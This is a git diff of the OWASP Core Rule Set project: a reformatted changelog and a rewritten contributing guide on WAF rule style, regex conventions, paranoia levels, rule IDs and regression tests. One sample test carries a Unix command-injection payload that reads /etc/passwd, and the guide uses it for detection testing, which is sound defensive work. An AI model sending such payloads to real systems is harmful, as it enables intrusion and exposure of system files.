Fixes: * Fixed restricted_extension false positive by adding boundary characters -== Version 2.0.6 - 2010-02-26 == +## Version 2.0.6 - 2010-02-26 Bug Fixes: @@ -966,7 +1521,7 @@ Bug Fixes: * Update phpids filters to use pass action instead of block -== Version 2.0.5 - 2010-02-01 == +## Version 2.0.5 - 2010-02-01 Improvements: 
@@ -985,7 +1540,7 @@ Improvements: * Updated HTTP Parameter Pollution (HPP) rule logic to concat data into a TX variable for inspection * Removed TX inspections for generic attacks and reverted to standard ARGS inspection https://www.modsecurity.org/tracker/browse/MODSEC-120 -* Updated the variable list for standard inspections (ARGS|ARGS_NAMES|XML:/*) and moved the other +* Updated the variable list for standard inspections (ARGS|ARGS_NAMES|XML:/\*) and moved the other variables to the PARANOID list (REQUEST_URI|REQUEST_BODY|REQUEST_HEADERS|TX:HPP_DATA) * Moved converted ET Snort rules to the /optional_rules directory * Created a new Header Tagging ruleset (optional_rules) that will add matched rule data to the @@ -1006,7 +1561,7 @@ Bug Fixes: and blocking -== Version 2.0.4 - 2009-11-30 == +## Version 2.0.4 - 2009-11-30 Improvements: @@ -1023,7 +1578,7 @@ Bug Fixes: phase:4 which would allow for blocking based on information leakage issues. -== Version 2.0.3 - 2009-11-05 == +## Version 2.0.3 - 2009-11-05 Improvements: @@ -1047,7 +1602,7 @@ Bug Fixes: https://www.modsecurity.org/tracker/browse/CORERULES-23 -== Version 2.0.2 - 2009-09-11 == +## Version 2.0.2 - 2009-09-11 Improvements: @@ -1059,7 +1614,7 @@ Bug Fixes: https://www.modsecurity.org/tracker/browse/CORERULES-15 -== Version 2.0.1 - 2009-08-07 == +## Version 2.0.1 - 2009-08-07 Improvements: @@ -1077,7 +1632,7 @@ Bug Fixes: https://www.modsecurity.org/tracker/browse/CORERULES-9 -== Version 2.0.0 - 2009-07-29 == +## Version 2.0.0 - 2009-07-29 New Rules & Features: 
@@ -1095,7 +1650,7 @@ New Rules & Features: logging and disruptive actions to take based on the score. * Correlated Events There are rules in phase:5 that will provide some correlation between inbound - events and outbound events and will provide a result of successful atttack or + events and outbound events and will provide a result of successful attack or attempted attack. * Updated Severity Ratings The severity ratings in the rules have been updated to the following: @@ -1175,7 +1730,7 @@ Other Fixes: rules and chained rules). -== Version 1.6.1 - 2008-04-22 == +## Version 1.6.1 - 2008-04-22 * Fixed a bug where phases and transformations where not specified explicitly @@ -1183,7 +1738,7 @@ Other Fixes: recommend to upgrade. -== Version 1.6.0 - 2008-02-19 == +## Version 1.6.0 - 2008-02-19 New Rulesets & Features: @@ -1221,7 +1776,7 @@ Additional rules logic: -== Version 1.5.1 - 2007-12-06 == +## Version 1.5.1 - 2007-12-06 False Positives Fixes: @@ -1238,7 +1793,7 @@ Other Fixes: * File 55 contained empty regular expressions. Fixed. -== Version 1.5 - 2007-11-23 == +## Version 1.5 - 2007-11-23 New Rulesets: @@ -1309,7 +1864,7 @@ version 1.4 build 2 - 2007-05-17 New Feature: * Search for signatures in XML content - XML Content will be parsed and ispected for signatures + XML Content will be parsed and inspected for signatures New Events: * 950116 - Unicode Full/Half Width Abuse Attack Attempt @@ -1373,14 +1928,14 @@ Fixed apache 2.4 dummy requests exclusion Added persistent PDF UXSS detection rule -== Version 1.3.2 build 3 2007-01-10 == +## Version 1.3.2 build 3 2007-01-10 Fixed regular expression in rule 960010 (file #30) to allow multipart form data content -== Version 1.3.2 - 2006-12-27 == +## Version 1.3.2 - 2006-12-27 New events: 
@@ -1394,7 +1949,7 @@ Regular expressions fixes: * The command injection wget is not searched in the UA header as it has different meaning there. * LDAP Fixed to reduce FPs: + More accurate regular expressions - + high bit characters not accpeted between signature tokens. + + high bit characters not accepted between signature tokens. * Do not detect The CRS project values third party contributions. To make the contribution process as easy as possible, a helpful set of contribution guidelines are in place which all contributors and developers are asked to adhere to. -* You will need a [GitHub account](https://github.com/signup/free). -* Submit a [ticket for your issue](https://github.com/SpiderLabs/owasp-modsecurity-crs/issues), assuming one does not already exist. - * Clearly describe the issue including steps to reproduce when it is a bug. - * Make sure you specify the version that you know has the issue. - * Bonus points for submitting a failing test along with the ticket. -* If you don't have push access, fork the repository on GitHub. +## Getting Started with a New Contribution + +1. Sign in to [GitHub](https://github.com/join). +2. Open a [new issue](https://github.com/coreruleset/coreruleset/issues) for the contribution, *assuming a similar issue doesn't already exist*. + * **Clearly describe the issue**, including steps to reproduce if reporting a bug. + * **Specify the CRS version in question** if reporting a bug. + * Bonus points for submitting tests along with the issue. +3. Fork the repository on GitHub and begin making changes there. +4. Signed commits are preferred. (For more information and help with this, refer to the [GitHub documentation](https://docs.github.com/en/authentication/managing-commit-signature-verification/signing-commits)). ## Making Changes -* Please base your changes on branch ```v3.3/dev``` -* Create a topic branch for your feature or bug fix. 
-* Please fix only one problem at a time; this will help to quickly test and merge your change. If you intend to fix multiple unrelated problems, please use a separate branch for each problem. +* Base any changes on branch `main`. +* Create a topic branch for each new contribution. +* Fix only one problem at a time. This helps to quickly test and merge submitted changes. If intending to fix *multiple unrelated problems* then use a separate branch for each problem. * Make commits of logical units. -* Make sure your commits adhere to the rules guidelines below. -* Make sure your commit messages are in the [proper format](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html): The first line of the message should have 50 characters or less, separated by a blank line from the (optional) body. The body should be wrapped at 70 characters and paragraphs separated by blank lines. Bulleted lists are also fine. +* Make sure commits adhere to the contribution guidelines presented in this document. +* Make sure commit messages follow the [standard Git format](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html). +* Make sure changes are submitted as a pull request (PR) on [GitHub](https://github.com/coreruleset/coreruleset/pulls). + * PR titles should follow the [Conventional Commits format](https://www.conventionalcommits.org/en/v1.0.0/), for example: `fix(rce): Fix a FP in rule 912345 with keyword 'time'`. + * If a PR only affects a single rule then the rule ID should be included in the title. + * If a PR title does not follow the correct format then a CRS developer will fix it. + +## General Formatting Guidelines for Rules Contributions + +* American English should be used throughout. +* 4 spaces should be used for indentation (no tabs). +* Files must end with a single newline character. +* No trailing whitespace at EOL. +* No trailing blank lines at EOF (only the required single EOF newline character is allowed). 
+* Adhere to an 80 character line length limit where possible. +* Add comments where possible and clearly explain any new rules. +* Comments must not appear between chained rules and should instead be placed before the start of a rule chain. +* All [chained rules](https://github.com/owasp-modsecurity/ModSecurity/wiki/Reference-Manual-(v2.x)#chain) should be indented like so, for readability: +``` +SecRule .. .. \ + "..." + SecRule .. .. \ + "..." + SecRule .. .. \ + "..." +``` +- Action lists in rules must always be enclosed in double quotes for readability, even if there is only one action (e.g., use `"chain"` instead of `chain`, and `"ctl:requestBodyAccess=Off"` instead of `ctl:requestBodyAccess=Off`). +- Always use numbers for phases instead of names. +- Format all use of `SecMarker` using double quotes, using UPPERCASE, and separating words with hyphens. For example: +``` +SecMarker "END-RESPONSE-959-BLOCKING-EVALUATION" +SecMarker "END-REQUEST-910-IP-REPUTATION" +``` +- Rule actions should appear in the following order, for consistency: +``` +id +phase +allow | block | deny | drop | pass | proxy | redirect +status +capture +t:xxx +log +nolog +auditlog +noauditlog +msg +logdata +tag +sanitiseArg +sanitiseRequestHeader +sanitiseMatched +sanitiseMatchedBytes +ctl +ver +severity +multiMatch +initcol +setenv +setvar +expirevar +chain +skip +skipAfter +``` +- Rule operators must always be explicitly specified. Although ModSecurity defaults to using the `@rx` operator, for clarity `@rx` should always be explicitly specified when used. For example, write: +``` +SecRule ARGS "@rx foo" "id:1,phase:1,pass,t:none" +``` +instead of +``` +SecRule ARGS "foo" "id:1,phase:1,pass,t:none" +``` + * Only the tags listed in the [util/APPROVED_TAGS](util/APPROVED_TAGS) file can be added to a rule. If you want to add a new tag, you **must** add it to this file. 
+ +## Variable Naming Conventions + +* Variable names should be lowercase and should use the characters a-z, 0-9, and underscores only. +* To reflect the different syntax between *defining* a variable (using `setvar`) and *using* a variable, the following visual distinction should be applied: + * **Variable definition:** Lowercase letters for collection name, dot as the separator, variable name. E.g.: `setvar:tx.foo_bar_variable` + * **Variable use:** Capital letters for collection name, colon as the separator, variable name. E.g.: `SecRule TX:foo_bar_variable` + +## Writing Regular Expressions + +* Use the following character class, in the stated order, to cover alphanumeric characters plus underscores and hyphens: `[a-zA-Z0-9_-]` + +### Portable Backslash Representation + +CRS uses `\x5c` to represent the backslash `\` character in regular expressions. Some of the reasons for this are: -## General Formatting Guidelines for rules contributions +* It's portable across web servers and WAF engines: it works with Apache, Nginx, and Coraza. +* It works with the [crs-toolchain](https://coreruleset.org/docs/development/crs_toolchain/) for building optimized regular expressions. - - 4 spaces per indentation level, no tabs - - no trailing whitespace at EOL or trailing blank lines at EOF - - comments are good, especially when they clearly explain the rule - - try to adhere to a 80 character line length limit - - if it is a [chained rule](https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#chain), alignment should be like +The older style of representing a backslash using the character class `[\\\\]` must _not_ be used. This was previously used in CRS to get consistent results between Apache and Nginx, owing to a quirk with how Apache would "double un-escape" character escapes. For future reference, the decision was made to stop using this older method because: + +* It can be confusing and difficult to understand how it works. 
+* It doesn't work with [crs-toolchain](https://coreruleset.org/docs/development/crs_toolchain/).
+* It doesn't work with Coraza.
+* It isn't obvious how to use it in a character class, e.g., `[a-zA-Z]`.
+
+### Forward Slash Representation
+
+CRS uses literal, *unescaped* forward slash `/` characters in regular expressions.
+
+Regular expression engines and libraries based on PCRE use the forward slash `/` character as the default delimiter. As such, forward slashes are often escaped in regular expression patterns. In the interests of readability, CRS does *not* escape forward slashes in regular expression patterns, which may seem unusual at first to new contributors.
+
+If testing a CRS regular expression using a third party tool, it may be useful to change the delimiter to something other than `/` if a testing tool raises errors because a CRS pattern features unescaped forward slashes.
+
+### When and Why to Anchor Regular Expressions
+
+Engines running the OWASP CRS will use regular expressions to _search_ the input string, i.e., the regular expression engine is asked to find the first match in the input string. If an expression needs to match the entire input then the expression must be anchored appropriately.
+
+#### Beginning of String Anchor (^)
+
+It is often necessary to match something at the start of the input to prevent false positives that match the same string in the middle of another argument, for example. Consider a scenario where the goal is to match the value of `REQUEST_HEADERS:Content-Type` to `multipart/form-data`. The following regular expression could be used:
+
+```python
+"@rx multipart/form-data"
 ```
- SecRule .. ..\
- "...."
- SecRule .. ..\
- "..."
- SecRule .. ..\
- ".."
-```
- - use quotes even if there is only one action, it improves readability (e.g., use `"chain"`, not `chain`, or `"ctl:requestBodyAccess=Off"` instead of `ctl:requestBodyAccess=Off`)
- - always use numbers for phases, instead of names
- - format your `SecMarker` between double quotes, using UPPERCASE and separating words using hyphens. Examples are:
-```
- SecMarker "END-RESPONSE-959-BLOCKING-EVALUATION"
- SecMarker "END-REQUEST-910-IP-REPUTATION"
-```
- - the proposed order for actions is:
-```
- id
- phase
- allow | block | deny | drop | pass | proxy | redirect
- status
- capture
- t:xxx
- log
- nolog
- auditlog
- noauditlog
- msg
- logdata
- tag
- sanitiseArg
- sanitiseRequestHeader
- sanitiseMatched
- sanitiseMatchedBytes
- ctl
- ver
- severity
- multiMatch
- initcol
- setenv
- setvar
- expirevar
- chain
- skip
- skipAfter
-```
-
-## Variable naming conventions
-
-* Variable names are lowercase using chars from `[a-z0-9_]`
-* To somewhat reflect the fact that the syntax for variable usage is different when you define it (using setvar) and when you use it, we propose the following visual distinction:
- * Lowercase letters for collection, dot as separator, variable name. E.g.,: `setvar:tx.foo_bar_variable`
- * Capital letters for collection, colon as separator, variable name. E.g.,: `SecRule TX:foo_bar_variable`
-
-## Rules compliance with each Paranoia Level (PL)
-
-Rules in the CRS are organized in Paranoia Levels, which allows you to choose the desired level of rule checks.
-
-Please read file ```crs-setup.conf.example``` for an introduction and a more detailed explanation of Paranoia Levels in the section `# -- [[ Paranoia Level Initialization ]]`.
-
-**PL0:**
-
-* Modsec installed, but almost no rules
-
-**PL1:**
-
-* Default level, keep in mind that most installations will normally use this one
-* If there is a complex memory consuming/evaluation rule it surely will be on upper levels, not this one
-* Normally we will use atomic checks in single rules
-* Confirmed matches only, all scores are allowed
-* No false positives / Low FP (Try to avoid adding rules with potential false positives!)
+
+HTTP headers can contain multiple values, and it may be necessary to guarantee that the value being searched for is the _first_ value of the header. There are different ways to do this but the simplest one is to use the `^` caret anchor to match the beginning of the string:
+
+```python
+"@rx ^multipart/form-data"
+```
+
+It will also be useful to ignore case sensitivity in this scenario:
+
+```python
+"@rx (?i)^multipart/form-data"
+```
+
+#### End of String Anchor ($)
+
+Consider, for example, needing to find the string `/admin/content/assets/add/evil` in the `REQUEST_FILENAME`. This could be achieved with the following regular expression:
+
+```python
+"@rx /admin/content/assets/add/evil"
+```
+
+If the input is changed, it can be seen that this expression can easily produce a false positive: `/admin/content/assets/add/evilbutactuallynot/nonevilfile`. If it is known that the file being searched for can't be in a subdirectory of `add` then the `$` anchor can be used to match the end of the input:
+
+```python
+"@rx /admin/content/assets/add/evil$"
+```
+
+This could be made a bit more general:
+
+```python
+"@rx /admin/content/assets/add/[a-z]+$"
+```
+
+#### Matching the Entire Input String
+
+It is sometimes necessary to match the entire input string to ensure that it _exactly_ matches what is expected. It might be necessary to find the "edit" action transmitted by WordPress, for example. To avoid false positives on variations (e.g., "myedit", "the edit", "editable", etc.), the `^` caret and `$` dollar anchors can be used to indicate that an exact string is expected. For example, to only match the _exact_ strings `edit` or `editpost`:
+
+```python
+"@rx ^(?:edit|editpost)$"
+```
+
+#### Other Anchors
+
+Other anchors apart from `^` caret and `$` dollar exist, such as `\A`, `\G`, and `\Z` in PCRE. CRS **strongly discourages** the use of other anchors for the following reasons:
+
+- Not all regular expression engines support all anchors and the OWASP CRS should be compatible with as many regular expression engines as possible.
+- Their function is sometimes not trivial.
+- They aren't well known and would require additional documentation.
+- In most cases that would justify their use the regular expression can be transformed into a form that doesn't require them, or the rule can be transformed (e.g., with an additional chain rule).
+
+### Use Capture Groups Sparingly
+
+Capture groups, i.e., parts of the regular expression surrounded by parentheses (`(` and `)`), are used to store the matched information from a string in memory for later use. Capturing input uses both additional CPU cycles and additional memory. In many cases, parentheses are *mistakenly* used for grouping and ensuring precedence.
+
+To group parts of a regular expression, or to ensure that the expression uses the precedence required, surround the concerning parts with `(?:` and `)`. Such a group is referred to as being "non-capturing". The following will create a capture group:
+
+```python
+"@rx a|(b|c)d"
+```
+
+On the other hand, this will create a _non-capturing_ group, guaranteeing the precedence of the alternative _without_ capturing the input:
+
+```python
+"@rx a|(?:b|c)d"
+```
+
+### Lazy Matching
+
+The question mark `?` can be used to turn "greedy" quantifiers into "lazy" quantifiers, i.e., `.+` and `.*` are greedy while `.+?` and `.*?` are lazy. Using lazy quantifiers can help with writing certain expressions that wouldn't otherwise be possible. However, in backtracking regular expression engines, like PCRE, lazy quantifiers can also be a source of performance issues. The following is an example of an expression that uses a lazy quantifier:
+
+```python
+"@rx (?i)\.cookie\b.*?;\W*?(?:expires|domain)\W*?="
+```
+
+This expression matches cookie values in HTML to detect session fixation attacks. The input string could be `document.cookie = "name=evil; domain=https://example.com";`.
+
+The lazy quantifiers in this expression are used to reduce the amount of backtracking that engines such as PCRE have to perform (others, such as RE2, are not affected by this). Since the asterisk `*` is greedy, `.*` would match every character in the input up to the end, at which point the regular expression engine would realize that the next character, `;`, can't be matched and it will backtrack to the previous position (`;`). A few iterations later, the engine will realize that the character `d` from `domain` can't be matched and it will backtrack again. This will happen again and again, until the `;` at `evil;` is found. Only then can the engine proceed with the next part of the expression.
+
+Using lazy quantifiers, the regular expression engine will instead match _as few characters as possible_. The engine will match ` ` (a space), then look for `;` and will not find it. The match will then be expanded to ` =` and, again, a match of `;` is attempted. This continues until the match is ` = "name=evil` and the engine finds `;`. While lazy matching still includes some work, in this case, backtracking would require many more steps.
+
+Lazy matching can have the inverse effect, though. Consider the following expression:
+
+```python
+"@rx (?i)\b(?:s(?:tyle|rc)|href)\b[\s\S]*?="
+```
+
+It matches some HTML attributes and then expects to see `=`. Using a somewhat contrived input, the lazy quantifier will require more steps to match then the greedy version would: `style                     =`. With the lazy quantifier, the regular expression engine will expand the match by one character for each of the space characters in the input, which means 21 steps in this case. With the greedy quantifier, the engine would match up to the end in a single step, backtrack one character and then match `=` (note that `=` is included in `[\s\S]`), which makes 3 steps.
+
+To summarize: **be very mindful about when and why you use lazy quantifiers in your regular expressions**.
+
+### Possessive Quantifiers and Atomic Groups
+
+Lazy and greedy matching change the order in which a regular expression engine processes a regular expression. However, the order of execution does not influence the backtracking behavior of backtracking engines.
+
+Possessive quantifiers (e.g., `x++`) and atomic groups (e.g., `(?>x)`) are tools that can be used to prevent a backtracking engine from backtracking. They _can_ be used for performance optimization but are only supported by backtracking engines and, therefore, are not permitted in CRS rules.
+
+### Writing Regular Expressions for Non-Backtracking Compatibility
+
+Traditional regular expression engines use backtracking to solve some additional problems, such as finding a string that is preceded or followed by another string. While this functionality can certainly come in handy and has its place in certain applications, it can also lead to performance issues and, in uncontrolled environments, open up possibilities for attacks (the term "[ReDoS](https://en.wikipedia.org/wiki/ReDoS)" is often used to describe an attack that exhausts process or system resources due to excessive backtracking).
+
+The OWASP CRS tries to be compatible with non-backtracking regular expression engines, such as RE2, because:
+
+- Non-backtracking engines are less vulnerable to ReDoS attacks.
+- Non-backtracking engines can often outperform backtracking engines.
+- CRS aims to leave the choice of the engine to the user/system.
+
+To ensure compatibility with non-backtracking regular expression engines, the following operations are **not** permitted in regular expressions:
+
+- positive lookahead (e.g., `(?=regex)`)
+- negative lookahead (e.g., `(?!regex)`)
+- positive lookbehind (e.g., `(?<=regex)`)
+- negative lookbehind (e.g., `(?regex)`)
+- backreferences (e.g., `\1`)
+- named backreferences (e.g., `(?P=name)`)
+- conditionals (e.g., `(?(regex)then|else)`)
+- recursive calls to capture groups (e.g., `(?1)`)
+- possessive quantifiers (e.g., `(?:regex)++`)
+- atomic (or possessive) groups (e.g., `(?>regex`))
+
+This list is not exhaustive but covers the most important points. The [RE2 documentation](https://github.com/google/re2/wiki/Syntax) includes a complete list of supported and unsupported features that various engines offer.
+
+### When and How to Optimize Regular Expressions
+
+Optimizing regular expressions is hard. Often, a change intended to improve the performance of a regular expression will change the original semantics by accident. In addition, optimizations usually make expressions harder to read. Consider the following example of URL schemes:
+
+```python
+mailto|mms|mumble|maven
+```
+
+An optimized version (produced by the [crs-toolchain]({{< ref "crs_toolchain" >}})) could look like this:
+
+```python
+m(?:a(?:ilto|ven)|umble|ms)
+```
+
+The above expression is an optimization because it reduces the number of backtracking steps when a branch fails. The regular expressions in the CRS are often comprised of lists of tens or even hundreds of words. Reading such an expression in an optimized form is difficult: even the _simple_ optimized example above is difficult to read.
+
+In general, contributors should not try to optimize contributed regular expressions and should instead strive for clarity. New regular expressions will usually be required to be submitted as a `.ra` file for the [crs-toolchain]({{< ref "crs_toolchain" >}}) to process. In such a file, the regular expression is decomposed into individual parts, making manual optimizations much harder or even impossible (and unnecessary with the `crs-toolchain`). The `crs-toolchain` performs some common optimizations automatically, such as the one shown above.
+
+Whether optimizations make sense in a contribution is assessed for each case individually.
+
+## Rules Compliance with Paranoia Levels
+
+The rules in CRS are organized into **paranoia levels** (PLs) which makes it possible to define how aggressive CRS is. See the documentation on [paranoia levels](https://coreruleset.org/docs/concepts/paranoia_levels/) for an introduction and more detailed explanation.
+
+Each rule that is placed into a paranoia level must contain the tag `paranoia-level/N`, where *N* is the PL value, however this tag can only be added if the rule does **not** use the nolog action.
+
+The types of rules that are allowed at each paranoia level are as follows:
+
+**PL 0:**
+
+* ModSecurity / WAF engine installed, but almost no rules
+
+**PL 1:**
+
+* Default level: keep in mind that most installations will normally use this level
+* Any complex, memory consuming evaluation rules will surely belong to a higher level, not this one
+* CRS will normally use atomic checks in single rules at this level
+* Confirmed matches only; all scores are allowed
+* No false positives / low false positives: try to avoid adding rules with potential false positives!
 * False negatives could happen
-**PL2:**
+**PL 2:**
-* Chains usage are OK
+* [Chain](https://github.com/owasp-modsecurity/ModSecurity/wiki/Reference-Manual-%28v2.x%29#chain) usage is allowed
 * Confirmed matches use score critical
-* Matches that cause false positives are limited to use score notice or warning
-* Low False positive rates
+* Matches that cause false positives are limited to using scores notice or warning
+* Low false positive rates
 * False negatives are not desirable
-**PL3:**
+**PL 3:**
-* Chains usage with complex regex look arounds and macro expansions
-* Confirmed matches use score warning or critical
-* Matches that cause false positives are limited to use score notice
-* False positive rates increased but limited to multiple matches (not single string)
+* Chain usage with complex regular expression look arounds and macro expansions are allowed
+* Confirmed matches use scores warning or critical
+* Matches that cause false positives are limited to using score notice
+* False positive rates are higher but limited to multiple matches (not single strings)
 * False negatives should be a very unlikely accident
-**PL4:**
+**PL 4:**
 * Every item is inspected
-* Variable creations allowed to avoid engine limitations
-* Confirmed matches use score notice, warning or critical
-* Matches that cause false positives are limited to use score notice and warning
-* False positive rates increased (even on single string)
-* False negatives should not happen here
-* Check everything against RFC and white listed values for most popular elements
-
+* Variable creations are allowed to avoid engine limitations
+* Confirmed matches use scores notice, warning, or critical
+* Matches that cause false positives are limited to using scores notice or warning
+* False positive rates are higher (even on single strings)
+* False negatives should not happen at this level
+* Check everything against RFCs and allow listed values for the most popular elements
 ## ID Numbering Scheme
-The CRS project used the numerical id rule namespace from 900,000 to 999,999 for the CRS rules as well as 9,000,000 to 9,999,999 for default CRS rule exclusion packages.
+The CRS project uses the numerical ID rule namespace from 900,000 to 999,999 for CRS rules, as well as 9,000,000 to 9,999,999 for default CRS rule exclusion packages and plugins.
+
+- Rules applying to the **incoming request** use the ID range 900,000 to 949,999.
+- Rules applying to the **outgoing response** use the ID range 950,000 to 999,999.
+
+The rules are grouped by the vulnerability class they address (SQLi, RCE, etc.) or the functionality they provide (e.g., initialization). These groups occupy blocks of thousands (e.g., SQLi: 942,000 - 942,999). These grouped rules are defined in files dedicated to a single group or functionality. The filename takes up the first three digits of the rule IDs defined within the file (e.g., SQLi: `REQUEST-942-APPLICATION-ATTACK-SQLI.conf`).
+
+The individual rules within each file for a vulnerability class are organized by the paranoia level of the rules. PL 1 is first, then PL 2, etc.
+
+The ID block 9xx000 - 9xx099 is reserved for use by CRS helper functionality. There are no blocking or filtering rules in this block.
+
+Among the rules providing CRS helper functionality are rules that skip other rules depending on the paranoia level. These rules always use the following reserved rule IDs: 9xx011 - 9xx018, with very few exceptions.
+
+The blocking and filter rules start at 9xx100 with a step width of 10, e.g., 9xx100, 9xx110, 9xx120, etc.
+
+The ID of a rule does not correspond directly with its paranoia level. Given the size of rule groups and how they're organized by paranoia level (starting with the lower PL rules first), PL 2 and above tend to be composed of rules with higher ID numbers.
-Rules applying to the incoming request use the id range 900,000 to 949,999.
-Rules applying to the outgoing response use the id range 950,000 to 999,999.
+### Stricter Siblings
-The rules are grouped by vulnerability class they address (SQLi, RCE, etc.) or functionality (initialization). These groups occupy blocks of thousands (e.g. SQLi: 942,000 - 942,999).
-The grouped rules are defined in files dedicated to a single group or functionality. The filename takes up the first three digits of the rule ids defined within the file (e.g. SQLi: REQUEST-942-APPLICATION-ATTACK-SQLI.conf).
+Within a rule file / block, there are sometimes smaller groups of rules that belong together. They're closely linked and very often represent copies of the original rules with a stricter limit (alternatively, they can represent the same rule addressing a different *target* in a second rule, where this is necessary). These are **stricter siblings** of the base rule. Stricter siblings usually share the first five digits of the rule ID and raise the rule ID by one, e.g., a base rule at 9xx160 and a stricter sibling at 9xx161.
+
+Stricter siblings often have different paranoia levels. This means that the base rule and the stricter siblings don't usually reside next to each another in the rule file. Instead, they're ordered by paranoia level and are linked by the first digits of their rule IDs. It's good practice to introduce all stricter siblings together as part of the definition of the base rule: this can be done in the comments of the base rule. It's also good practice to refer back to the base rule with the keywords "stricter sibling" in the comments of the stricter siblings themselves. For example: "...This is performed in two separate stricter siblings of this rule: 9xxxx1 and 9xxxx2", and "This is a stricter sibling of rule 9xxxx0."
+
+## Writing Tests
+
+Each rule should be accompanied by tests. Rule tests are an invaluable way to check that a rule behaves as expected:
+
+- Does the rule correctly match against the payloads and behaviors that the rule is designed to detect? (**Positive tests**)
+- Does the rule correctly **not** match against legitimate requests, i.e., the rule doesn't cause obvious false positives? (**Negative tests**)
+
+Rule tests also provide an excellent way to test WAF engines and implementations to ensure they behave and execute CRS rules as expected.
+
+The rule tests are located under `tests/regression/tests`. Each CRS rule *file* has a corresponding *directory* and each individual *rule* has a corresponding *YAML file* containing all the tests for that rule. For example, the tests for rule 911100 *(Method is not allowed by policy)* are in the file `REQUEST-911-METHOD-ENFORCEMENT/911100.yaml`.
+
+Full documentation of the required formatting and available options of the YAML tests can be found at https://github.com/coreruleset/ftw/blob/main/docs/YAMLFormat.md.
+
+Documentation on how to run the CRS test suite can be found in the [online documentation](https://coreruleset.org/docs/development/testing/).
+
+### Positive Tests
+
+Example of a simple *positive test*:
+
+```yaml
+- test_title: 932230-26
+ desc: "Unix command injection"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "var=` /bin/cat /etc/passwd`"
+ version: HTTP/1.1
+ output:
+ log_contains: id "932230"
+```
+
+This test will succeed if the log output contains `id "932230"`, which would indicate that the rule in question matched and generated an alert.
+
+It's important that tests consistently include the HTTP header fields `Host`, `User-Agent`, and `Accept`. CRS includes rules that detect if these headers are missing or empty, so these headers should be included in each test to avoid unnecessarily causing those rules to match. Ideally, *each positive test should cause* **only** *the rule in question to match*.
+
+The rule's description field, `desc`, is important. It should describe what is being tested: what *should* match, what should *not* match, etc.
+
+### Negative Tests
+
+Example of a simple *negative test*:
+
+```yaml
+- test_title: 932260-4
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ method: "POST"
+ port: 80
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: "localhost"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ data: 'foo=ping pong tables'
+ uri: '/post'
+ output:
+ no_log_contains: id "932260"
+```
+
+This test will succeed if the log output does **not** contain `id "932260"`, which would indicate that the rule in question did **not** match and so did **not** generate an alert.
+
+### Encoded and Raw Requests
+
+It is possible to *encode* an entire test request. This encapsulates the request and means that the request headers and payload don't need to be explicitly declared. This is useful when a test request needs to use unusual bytes which might break YAML parsers, or when a test request must be intentionally malformed in a way that is impossible to describe otherwise. An encoded request is sent exactly as intended.
+
+The `encoded_request` field works like so:
+
+```yaml
+encoded_request:
+```
+
+For example:
+```yaml
+encoded_request: "R0VUIFwgSFRUUA0KDQoK"
+```
+
+where `R0VUIFwgSFRUUA0KDQoK` is the base64-encoded equivalent of `GET \ HTTP\r\n\r\n`.
+
+The older method of using `raw_request` is deprecated as it's difficult to maintain and less portable than `encoded_request`.
+
+### Using The Correct HTTP Endpoint
+
+The CRS project uses [kennthreitz/httpbin](https://hub.docker.com/r/kennethreitz/httpbin) as the backend server for tests. This backend provides one dedicated endpoint for each HTTP method. Tests should target these endpoints to:
+
+- improve test throughput (prevent HTML from being returned by the backend)
+- add automatic HTTP method verification (the backend will respond with status code `405` (method not allowed) to requests whose method does not match the endpoint)
+
+Test URIs should be structured as follows, where `` must be replaced by the name of the HTTP method the test uses:
+
+```yaml
+#...
+ method:
+ uri: //some/arbitrary/url
+#...
+```
-The individual rule files for the vulnerability classes are organized by the paranoia level of the rules. PL 1 is first, then PL 2 etc.
+## Further Guidance on Rule Writing
-The block from 9XX000 - 9XX099 is reserved for use by CRS helper functionality. There are no blocking or filtering rules in this block.
+### Leaving Audit Log Configuration Unchanged
-Among the rules serving a CRS helper functionality are rules that skip rules depending on the paranoia level. These rules always use the following reserved rule ids: 9XX011-9XX018 with very few exceptions.
+Former versions of CRS dynamically included the HTTP response body in the audit log via special `ctl` statements on certain individual response rules. This was never applied in a systematic way and, regardless, CRS should not change the format of the audit log by itself, namely because this can lead to information leakages. Therefore, the use of `ctl:auditLogParts=+E` or any other form of `ctl:auditLogParts` is not allowed in CRS rules.
-The blocking or filter rules start with 9XX100 with a step width of 10. E.g. 9XX100, 9XX110, 9XX120 etc. The rule id does not correspond directly with the paranoia level of a rule. Given the size of a rule group and the organization by lower PL rules first, PL2 and above tend to have rule IDs with higher numbers.
+## Non-Rules General Guidelines
-Within a rule file / block, there are sometimes smaller groups of rules that belong to together. They are closely linked and very often represent copies of the original rules with a stricter limit (alternatively, they can represent the same rule addressing a different target in a second rule where this was necessary). These are stricter siblings of the base rule. Stricter siblings usually share the first five digits of the rule ID and raise the rule ID by one. E.g., Base rule at 9XX160, stricter sibling at 9XX161.
+* Remove trailing spaces from files (if they're not needed). This will make linters happy.
+* EOF should have an EOL.
-Stricter siblings often have a different paranoia level. This means that the base rule and the stricter sibling do not reside next to one another in the rule file. Instead they are ordered in their appropriate paranoia level and can be linked via the first digits of the rule id. It is a good practice to introduce stricter siblings together with the base rule in the comments of the base rule and to reference the base rule with the keyword stricter sibling in the comments of the stricter sibling. E.g., "... This is
-performed in two separate stricter siblings of this rule: 9XXXX1 and 9XXXX2", "This is a stricter sibling of rule 9XXXX0."
+The `pre-commit` framework can be used to check for and fix these issues automatically. First, go to the [pre-commit](https://pre-commit.com/) website and download the framework. Then, after installing, use the command `pre-commit install` so that the tools are installed and run each time a commit is made. CRS provides a config file that will keep the repository clean.
diff --git a/CONTRIBUTORS.md b/CONTRIBUTORS.md
index c34a742365..28f86dfbef 100644
--- a/CONTRIBUTORS.md
+++ b/CONTRIBUTORS.md
@@ -2,59 +2,82 @@
 ## Project Co-Leads:
-- [Chaim Sanders](https://github.com/csanders-git)
 - [Christian Folini](https://github.com/dune73)
 - [Walter Hop](https://github.com/lifeforms)
+- [Felipe Zipitría](https://github.com/fzipi)
 ## Developers:
